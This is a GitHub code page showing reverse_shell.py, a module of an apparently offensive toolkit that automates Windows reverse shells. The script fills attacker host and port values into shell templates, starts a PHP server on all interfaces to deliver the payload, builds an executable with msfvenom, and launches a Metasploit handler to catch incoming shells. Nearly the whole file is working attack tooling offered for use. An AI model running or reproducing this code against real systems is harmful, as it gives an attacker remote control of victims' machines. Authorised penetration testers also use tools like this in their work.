-
Notifications
You must be signed in to change notification settings - Fork 59
/
Copy pathreverse_shell.py
144 lines (122 loc) · 4.26 KB
/
reverse_shell.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
#!/usr/bin/env python3
import os
import json
import subprocess as subp
from modules.sftp import sftp
R = '\033[31m' # red
G = '\033[32m' # green
C = '\033[36m' # cyan
W = '\033[0m' # white
def rshell(win):
print('\n', end='')
rs_scripts = []
for (dirpath, dirname, filenames) in os.walk('scripts/windows/reverse_shell'):
rs_scripts.extend(filenames)
for item in rs_scripts:
print(G + '[{}] '.format(rs_scripts.index(item)) + C + item)
while True:
try:
rshell_choice = input(G + '\nfs[windows/reverse_shell] > ' + W)
if rshell_choice == 'clear':
os.system('clear')
elif rshell_choice == 'back':
return win()
elif rshell_choice == 'help':
return rshell(win)
elif rshell_choice == '':
pass
elif rshell_choice == 'exit' or rshell_choice == 'quit':
quit()
elif int(rshell_choice) <= len(rs_scripts) - 1:
with open('conf/rshell_scripts.json', 'r') as json_file:
options = json.load(json_file)
rshell.chosen = rs_scripts[int(rshell_choice)]
for k,v in options.items():
if k in rshell.chosen:
try:
sftp_state = v['sftp']
msf_state = v['msf']
desc = v['desc']
rshell.module = v['module']
rshell.srv_state = v['srv']
rshell.target = v['target']
except KeyError:
pass
print('\n', end = '')
print(G + '[+]' + C + ' Script : ' + W + rshell.chosen + '\n')
print(G + '[+]' + C + ' Info : ' + W + desc + '\n')
if sftp_state == 1:
sftp()
else:
pass
if msf_state == 1:
print(G + '[+]' + C + ' Module : ' + W + rshell.module + '\n')
rshell.payload = input(G + '[+]' + C + ' Payload : ' + W)
rshell.lhost = input(G + '[+]' + C + ' LHOST : ' + W)
rshell.lport = input(G + '[+]' + C + ' LPORT : ' + W)
else:
pass
if rshell.srv_state == 1:
rshell.srvhost = input(G + '[+]' + C + ' SRVHOST : ' + W)
rshell.srvport = input(G + '[+]' + C + ' SRVPORT : ' + W)
else:
rshell.php_port = input(G + '[+]' + C + ' PHP Server Port : ' + W)
print(G + '[+]' + C + ' Starting PHP Server...' + W)
subp.Popen(['php', '-S', '0.0.0.0:{}'.format(rshell.php_port)], stdout=subp.PIPE)
rshell.filename = input(G + '[+]' + C + ' Filename (Without Extension) : ' + W)
rshell.script_path = '/scripts/windows/reverse_shell/' + rshell.chosen
rshell_output()
msf()
else:
print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
pass
except ValueError:
print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
pass
def rshell_output():
base_path = os.getcwd() + rshell.script_path
with open(base_path, 'r') as file :
filedata = file.read()
if rshell.srv_state == 1:
filedata = filedata.replace('SRVHOST', rshell.srvhost)
filedata = filedata.replace('SRVPORT', rshell.srvport)
else:
filedata = filedata.replace('LHOST', rshell.lhost)
filedata = filedata.replace('PHPPORT', rshell.php_port)
filedata = filedata.replace('FILENAME', rshell.filename)
with open('output/{}'.format(rshell.chosen), 'w') as file:
file.write(filedata)
outfile_path = os.getcwd() + '/output/{}'.format(rshell.chosen)
print(G + '[+]' + C + ' Script Generated : ' + W + outfile_path)
def msf():
msf_choice = input(G + '[+]' + C + ' Start Metasploit Framework [y/n]: ' + W)
if msf_choice == 'y':
print('\n', end='')
if rshell.srv_state == 1:
subp.call(['msfconsole', '-q', '-x', 'use {}; \
set payload {}; \
set LHOST {}; \
set LPORT {}; \
set target {}; \
set SRVHOST {}; \
set SRVPORT {}; \
set URIPATH {}; \
exploit -j'.format(rshell.module, rshell.payload, rshell.lhost, rshell.lport, rshell.target, rshell.srvhost, rshell.srvport, rshell.filename)])
else:
print(G + '[+]' + C + ' Generating Payload...' + W + '\n')
subp.call(['msfvenom',
'-p', '{}'.format(rshell.payload),
'LHOST={}'.format(rshell.lhost),
'LPORT={}'.format(rshell.lport),
'-f', 'exe',
'-o', '{}.exe'.format(rshell.filename)])
subp.call(['msfconsole', '-q', '-x', 'use {}; \
set payload {}; \
set LHOST {}; \
set LPORT {}; \
set target {}; \
exploit -j'.format(rshell.module, rshell.payload, rshell.lhost, rshell.lport, rshell.target)])
elif msf_choice == 'n':
pass
else:
pass